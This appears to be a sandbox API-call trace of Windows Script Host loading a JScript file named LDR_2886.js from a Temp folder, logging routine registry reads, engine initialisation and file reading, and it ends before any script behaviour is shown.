	[0118.028] QueryPerformanceCounter (in: lpPerformanceCount=0x17fb28 | out: lpPerformanceCount=0x17fb28*=24245430100) returned 1
	[0118.028] GetStartupInfoA (in: lpStartupInfo=0x17fb40 | out: lpStartupInfo=0x17fb40*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0118.030] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0118.030] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0118.030] GetVersionExA (in: lpVersionInformation=0x17fa60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x181eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17fa60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.030] GetUserDefaultLCID () returned 0x409
	[0118.031] CoInitialize (pvReserved=0x0) returned 0x0
	[0118.264] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0118.264] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0118.264] ??2@YAPEAX_K@Z () returned 0x257b0
	[0118.264] ??2@YAPEAX_K@Z () returned 0x25f60
	[0118.264] GetCurrentThreadId () returned 0x6d8
	[0118.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f7a8 | out: phkResult=0x17f7a8*=0x7c) returned 0x0
	[0118.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f7a0 | out: phkResult=0x17f7a0*=0x80) returned 0x0
	[0118.265] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x17eaa8, lpData=0x17eeb0, lpcbData=0x17eaa0*=0x400 | out: lpType=0x17eaa8*=0x0, lpData=0x17eeb0*=0x67, lpcbData=0x17eaa0*=0x400) returned 0x2
	[0118.265] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x17eaa8, lpData=0x17eeb0, lpcbData=0x17eaa0*=0x400 | out: lpType=0x17eaa8*=0x0, lpData=0x17eeb0*=0x67, lpcbData=0x17eaa0*=0x400) returned 0x2
	[0118.265] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x17eaa8, lpData=0x17eeb0, lpcbData=0x17eaa0*=0x400 | out: lpType=0x17eaa8*=0x0, lpData=0x17eeb0*=0x67, lpcbData=0x17eaa0*=0x400) returned 0x2
	[0118.265] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0118.992] RegCloseKey (hKey=0x80) returned 0x0
	[0118.992] RegCloseKey (hKey=0x7c) returned 0x0
	[0118.992] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f4c0 | out: phkResult=0x17f4c0*=0x7c) returned 0x0
	[0118.992] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f4b8 | out: phkResult=0x17f4b8*=0x80) returned 0x0
	[0118.992] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x17e7c8, lpData=0x17ebd0, lpcbData=0x17e7c0*=0x400 | out: lpType=0x17e7c8*=0x0, lpData=0x17ebd0*=0x0, lpcbData=0x17e7c0*=0x400) returned 0x2
	[0118.992] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x17e7c8, lpData=0x17ebd0, lpcbData=0x17e7c0*=0x400 | out: lpType=0x17e7c8*=0x0, lpData=0x17ebd0*=0x0, lpcbData=0x17e7c0*=0x400) returned 0x2
	[0118.992] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x17e7c8, lpData=0x17ebd0, lpcbData=0x17e7c0*=0x400 | out: lpType=0x17e7c8*=0x0, lpData=0x17ebd0*=0x0, lpcbData=0x17e7c0*=0x400) returned 0x2
	[0118.992] RegCloseKey (hKey=0x80) returned 0x0
	[0118.992] RegCloseKey (hKey=0x7c) returned 0x0
	[0118.992] GetACP () returned 0x4e4
	[0118.992] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0118.992] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0118.992] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0118.992] FreeLibrary (hLibModule=0x77040000) returned 1
	[0118.992] ??2@YAPEAX_K@Z () returned 0x25f80
	[0118.993] CoRegisterMessageFilter (in: lpMessageFilter=0x25f80, lplpMessageFilter=0x25f90 | out: lplpMessageFilter=0x25f90*=0x0) returned 0x0
	[0118.993] GetModuleFileNameW (in: hModule=0xffa90000, lpFilename=0x17f800, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0118.993] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x17f150 | out: lpdwHandle=0x17f150) returned 0x704
	[0118.994] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x17ea40 | out: lpData=0x17ea40) returned 1
	[0118.994] VerQueryValueW (in: pBlock=0x17ea40, lpSubBlock="\\", lplpBuffer=0x17f158, puLen=0x17f154 | out: lplpBuffer=0x17f158*=0x17ea68, puLen=0x17f154) returned 1
	[0118.994] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f1a8 | out: phkResult=0x17f1a8*=0x7c) returned 0x0
	[0118.994] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x17e4f8, lpData=0x17e900, lpcbData=0x17e4f0*=0x400 | out: lpType=0x17e4f8*=0x0, lpData=0x17e900*=0x0, lpcbData=0x17e4f0*=0x400) returned 0x2
	[0118.994] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f160 | out: phkResult=0x17f160*=0x80) returned 0x0
	[0118.994] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x17f124, lpData=0x17f1a0, lpcbData=0x17f120*=0x4 | out: lpType=0x17f124*=0x0, lpData=0x17f1a0*=0xd0, lpcbData=0x17f120*=0x4) returned 0x2
	[0118.994] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x17e4f8, lpData=0x17e900, lpcbData=0x17e4f0*=0x400 | out: lpType=0x17e4f8*=0x0, lpData=0x17e900*=0x0, lpcbData=0x17e4f0*=0x400) returned 0x2
	[0118.994] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x17f124, lpData=0x17f1a0, lpcbData=0x17f120*=0x4 | out: lpType=0x17f124*=0x0, lpData=0x17f1a0*=0xd0, lpcbData=0x17f120*=0x4) returned 0x2
	[0118.994] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x17e4f8, lpData=0x17e900, lpcbData=0x17e4f0*=0x400 | out: lpType=0x17e4f8*=0x1, lpData="1", lpcbData=0x17e4f0*=0x4) returned 0x0
	[0118.995] lstrlenW (lpString="1") returned 1
	[0118.995] lstrlenW (lpString="0") returned 1
	[0118.995] lstrlenW (lpString="1") returned 1
	[0118.995] lstrlenW (lpString="no") returned 2
	[0118.995] lstrlenW (lpString="1") returned 1
	[0118.995] lstrlenW (lpString="false") returned 5
	[0118.995] RegCloseKey (hKey=0x80) returned 0x0
	[0118.995] RegCloseKey (hKey=0x7c) returned 0x0
	[0118.995] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x17f1a8, lpdwDisposition=0x0 | out: phkResult=0x17f1a8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0118.995] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x17f144, lpData=0x17f1a0, lpcbData=0x17f140*=0x4 | out: lpType=0x17f144*=0x0, lpData=0x17f1a0*=0xd0, lpcbData=0x17f140*=0x4) returned 0x2
	[0118.995] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x17e518, lpData=0x17e920, lpcbData=0x17e510*=0x400 | out: lpType=0x17e518*=0x1, lpData="1", lpcbData=0x17e510*=0x4) returned 0x0
	[0118.995] lstrlenW (lpString="1") returned 1
	[0118.995] lstrlenW (lpString="0") returned 1
	[0118.995] lstrlenW (lpString="1") returned 1
	[0118.995] lstrlenW (lpString="no") returned 2
	[0118.995] lstrlenW (lpString="1") returned 1
	[0118.995] lstrlenW (lpString="false") returned 5
	[0118.995] RegCloseKey (hKey=0x7c) returned 0x0
	[0118.995] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x17f1a8, lpdwDisposition=0x0 | out: phkResult=0x17f1a8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0118.995] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x17f144, lpData=0x17f1a0, lpcbData=0x17f140*=0x4 | out: lpType=0x17f144*=0x0, lpData=0x17f1a0*=0xd0, lpcbData=0x17f140*=0x4) returned 0x2
	[0118.995] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x17e518, lpData=0x17e920, lpcbData=0x17e510*=0x400 | out: lpType=0x17e518*=0x0, lpData=0x17e920*=0x31, lpcbData=0x17e510*=0x400) returned 0x2
	[0118.995] RegCloseKey (hKey=0x7c) returned 0x0
	[0118.995] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0118.995] lstrlenW (lpString="js") returned 2
	[0118.995] lstrlenW (lpString="WSH") returned 3
	[0118.996] ??2@YAPEAX_K@Z () returned 0x25870
	[0118.996] LoadStringW (in: hInstance=0xffa90000, uID=0x9c5, lpBuffer=0x17dc10, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0118.996] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x17ec50*=0x0 | out: pptlib=0x17ec50*=0x1ad100) returned 0x0
	[0119.001] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ad100, GUID=0xffa958f0, ppTInfo=0x17ec38 | out: ppTInfo=0x17ec38*=0x1ae4e8) returned 0x0
	[0119.003] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ae4e8, index=0xffffffff, pRefType=0x17ec30 | out: pRefType=0x17ec30*=0xfffffffe) returned 0x0
	[0119.003] ITypeInfo:GetRefTypeInfo (in: This=0x1ae4e8, hreftype=0xfffffffe, ppTInfo=0xffaaf458 | out: ppTInfo=0xffaaf458*=0x1ae540) returned 0x0
	[0119.003] IUnknown:Release (This=0x1ae4e8) returned 0x1
	[0119.003] ??2@YAPEAX_K@Z () returned 0x25900
	[0119.003] ??2@YAPEAX_K@Z () returned 0x259a0
	[0119.003] ??2@YAPEAX_K@Z () returned 0x25a00
	[0119.003] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ad100, GUID=0xffa95950, ppTInfo=0x17ec38 | out: ppTInfo=0x17ec38*=0x1ae598) returned 0x0
	[0119.003] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ae598, index=0xffffffff, pRefType=0x17ec30 | out: pRefType=0x17ec30*=0xfffffffe) returned 0x0
	[0119.003] ITypeInfo:GetRefTypeInfo (in: This=0x1ae598, hreftype=0xfffffffe, ppTInfo=0xffaaf4d8 | out: ppTInfo=0xffaaf4d8*=0x1ae5f0) returned 0x0
	[0119.003] IUnknown:Release (This=0x1ae598) returned 0x1
	[0119.003] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ad100, GUID=0xffa95960, ppTInfo=0x17ec38 | out: ppTInfo=0x17ec38*=0x1ae648) returned 0x0
	[0119.003] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ae648, index=0xffffffff, pRefType=0x17ec30 | out: pRefType=0x17ec30*=0xfffffffe) returned 0x0
	[0119.004] ITypeInfo:GetRefTypeInfo (in: This=0x1ae648, hreftype=0xfffffffe, ppTInfo=0xffaaf518 | out: ppTInfo=0xffaaf518*=0x1ae6a0) returned 0x0
	[0119.004] IUnknown:Release (This=0x1ae648) returned 0x1
	[0119.004] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ad100, GUID=0xffa95910, ppTInfo=0x17ec38 | out: ppTInfo=0x17ec38*=0x1ae6f8) returned 0x0
	[0119.004] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ae6f8, index=0xffffffff, pRefType=0x17ec30 | out: pRefType=0x17ec30*=0xfffffffe) returned 0x0
	[0119.004] ITypeInfo:GetRefTypeInfo (in: This=0x1ae6f8, hreftype=0xfffffffe, ppTInfo=0xffaaf498 | out: ppTInfo=0xffaaf498*=0x1ae750) returned 0x0
	[0119.004] IUnknown:Release (This=0x1ae6f8) returned 0x1
	[0119.004] IUnknown:Release (This=0x1ad100) returned 0x4
	[0119.004] ??2@YAPEAX_K@Z () returned 0x25a60
	[0119.004] GetCurrentThreadId () returned 0x6d8
	[0119.004] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0119.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffaa1cf8, lpParameter=0x25a60, dwCreationFlags=0x0, lpThreadId=0x25a88 | out: lpThreadId=0x25a88*=0x4b8) returned 0xd4
	[0119.005] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x17ee90*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0119.260] CloseHandle (hObject=0xcc) returned 1
	[0119.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x17ef20, lpFilePart=0x17ef10 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x17ef10*="LDR_2886.js") returned 0x30
	[0119.260] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x17e430 | out: phkResult=0x17e430*=0xe6) returned 0x0
	[0119.260] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x17e3e0, lpData=0x17e440, lpcbData=0x17e3e4*=0x800 | out: lpType=0x17e3e0*=0x1, lpData="JSFile", lpcbData=0x17e3e4*=0xe) returned 0x0
	[0119.260] RegCloseKey (hKey=0xe6) returned 0x0
	[0119.260] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x17e430 | out: phkResult=0x17e430*=0xe6) returned 0x0
	[0119.261] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x17e3e0, lpData=0x17ecb0, lpcbData=0x17e3e4*=0x200 | out: lpType=0x17e3e0*=0x1, lpData="JScript", lpcbData=0x17e3e4*=0x10) returned 0x0
	[0119.261] RegCloseKey (hKey=0xe6) returned 0x0
	[0119.261] ??2@YAPEAX_K@Z () returned 0x263a0
	[0119.261] GetProcessHeap () returned 0x180000
	[0119.261] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x2000) returned 0x1b8430
	[0119.261] CLSIDFromString (in: lpsz="JScript", pclsid=0x17ec28 | out: pclsid=0x17ec28*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0119.262] CoCreateInstance (rclsid=0x17ec28*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa91800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17ec20) 
	[0119.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17ce20 | out: lpSystemTimeAsFileTime=0x17ce20*(dwLowDateTime=0xbf4d1f10, dwHighDateTime=0x1d543d1)) 
	[0119.269] GetCurrentProcessId () returned 0x71c
	[0119.269] GetCurrentThreadId () returned 0x6d8
	[0119.269] GetTickCount () returned 0x2e2df
	[0119.269] QueryPerformanceCounter (in: lpPerformanceCount=0x17ce28 | out: lpPerformanceCount=0x17ce28*=24369527681) returned 1
	[0119.270] malloc (_Size=0x100) returned 0x26670
	[0119.270] __dllonexit () returned 0x7fee1410728
	[0119.270] __dllonexit () returned 0x7fee1410780
	[0119.270] __dllonexit () returned 0x7fee1410750
	[0119.270] __dllonexit () returned 0x7fee14107b0
	[0119.270] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0119.271] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0119.271] EtwRegisterTraceGuidsA () returned 0x0
	[0119.271] EtwRegisterTraceGuidsA () returned 0x0
	[0119.271] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x17ca10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0119.272] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0119.272] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x17cb78 | out: phkResult=0x17cb78*=0x0) returned 0x2
	[0119.281] IdentifyCodeAuthzLevelW () returned 0x1
	[0119.577] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17df20 | out: lpSystemTimeAsFileTime=0x17df20*(dwLowDateTime=0xbf7a97b0, dwHighDateTime=0x1d543d1)) 
	[0119.577] GetCurrentProcessId () returned 0x71c
	[0119.577] GetCurrentThreadId () returned 0x6d8
	[0119.577] GetTickCount () returned 0x2e417
	[0119.577] QueryPerformanceCounter (in: lpPerformanceCount=0x17df28 | out: lpPerformanceCount=0x17df28*=24400361280) returned 1
	[0119.578] malloc (_Size=0x100) returned 0x27b60
	[0119.578] GetVersionExA (in: lpVersionInformation=0x17dd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x17dd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0119.578] GetUserDefaultLCID () returned 0x409
	[0119.578] IsFileSupportedName () returned 0x1
	[0119.700] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0119.700] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0119.700] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0119.704] GetSignedDataMsg () returned 0x0
	[0119.704] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.704] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x17e560, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x17e560*=0x140) returned 1
	[0119.704] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0119.704] ??2@YAPEAX_K@Z () returned 0x2a4f0
	[0119.704] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0119.704] ReadFile (in: hFile=0x140, lpBuffer=0x2a4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x17e540, lpOverlapped=0x0 | out: lpBuffer=0x2a4f0*, lpNumberOfBytesRead=0x17e540*=0x4b68, lpOverlapped=0x0) returned 1
	[0119.704] CoInitialize (pvReserved=0x0) returned 0x1
	[0119.704] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x17e4b0 | out: ppv=0x17e4b0*=0x2f4c0) returned 0x0
	[0119.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17c6b0 | out: lpSystemTimeAsFileTime=0x17c6b0*(dwLowDateTime=0xbf8ce730, dwHighDateTime=0x1d543d1)) 
	[0119.708] GetCurrentProcessId () returned 0x71c
	[0119.708] GetCurrentThreadId () returned 0x6d8
	[0119.708] GetTickCount () returned 0x2e484
	[0119.708] QueryPerformanceCounter (in: lpPerformanceCount=0x17c6b8 | out: lpPerformanceCount=0x17c6b8*=24413439936) returned 1
	[0119.708] malloc (_Size=0x100) returned 0x27c70
	[0119.709] __dllonexit () returned 0x7fedf0714c0
	[0119.709] __dllonexit () returned 0x7fedf0714e8
	[0119.709] GetVersionExA (in: lpVersionInformation=0x17c490*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xdf072dc9, dwBuildNumber=0x7fe, dwPlatformId=0xdf0714e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x17c490*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0119.709] GetProcessWindowStation () returned 0x30
	[0119.709] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x17c478, nLength=0xc, lpnLengthNeeded=0x17c470 | out: pvInfo=0x17c478, lpnLengthNeeded=0x17c470) returned 1
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f060
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f0b0
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f0e0
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f120
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f160
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f1a0
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f1e0
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f220
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f260
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f2a0
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f2e0
	[0119.709] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f330
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f370
	[0119.709] DllGetClassObject (in: rclsid=0x1be400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17d180 | out: ppv=0x17d180*=0x2f0b0) returned 0x0
	[0119.709] ??2@YAPEAX_K@Z () returned 0x2f0b0
	[0119.710] IClassFactory:CreateInstance (in: This=0x2f0b0, pUnkOuter=0x0, riid=0x17df60*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x17d1a0 | out: ppvObject=0x17d1a0*=0x2f4c0) returned 0x0
	[0119.710] ??2@YAPEAX_K@Z () returned 0x2f3b0
	[0119.710] GetSystemInfo (in: lpSystemInfo=0x17cfe0 | out: lpSystemInfo=0x17cfe0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0119.710] VirtualQuery (in: lpAddress=0x17d050, lpBuffer=0x17d010, dwLength=0x30 | out: lpBuffer=0x17d010*(BaseAddress=0x17d000, AllocationBase=0x80000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0119.710] ??2@YAPEAX_K@Z () returned 0x2f3f0
	[0119.710] ??2@YAPEAX_K@Z () returned 0x2f410
	[0119.710] ??2@YAPEAX_K@Z () returned 0x2f470
	[0119.710] ??2@YAPEAX_K@Z () returned 0x2f4a0
	[0119.710] ??2@YAPEAX_K@Z () returned 0x2f550
	[0119.710] IUnknown:AddRef (This=0x2f4c0) returned 0x2
	[0119.710] IUnknown:Release (This=0x2f4c0) returned 0x1
	[0119.710] IUnknown:Release (This=0x2f0b0) returned 0x0
	[0119.710] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.710] IUnknown:QueryInterface (in: This=0x2f4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x17e3e8 | out: ppvObject=0x17e3e8*=0x2f4c0) returned 0x0
	[0119.710] IUnknown:Release (This=0x2f4c0) returned 0x1
	[0119.710] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0119.710] IsTextUnicode (in: lpv=0x2a4f0, iSize=19304, lpiResult=0x17e438 | out: lpiResult=0x17e438) returned 0
	[0119.710] GetACP () returned 0x4e4
	[0119.710] malloc (_Size=0x97d0) returned 0x2fdfd0
	[0119.711] GetACP () returned 0x4e4
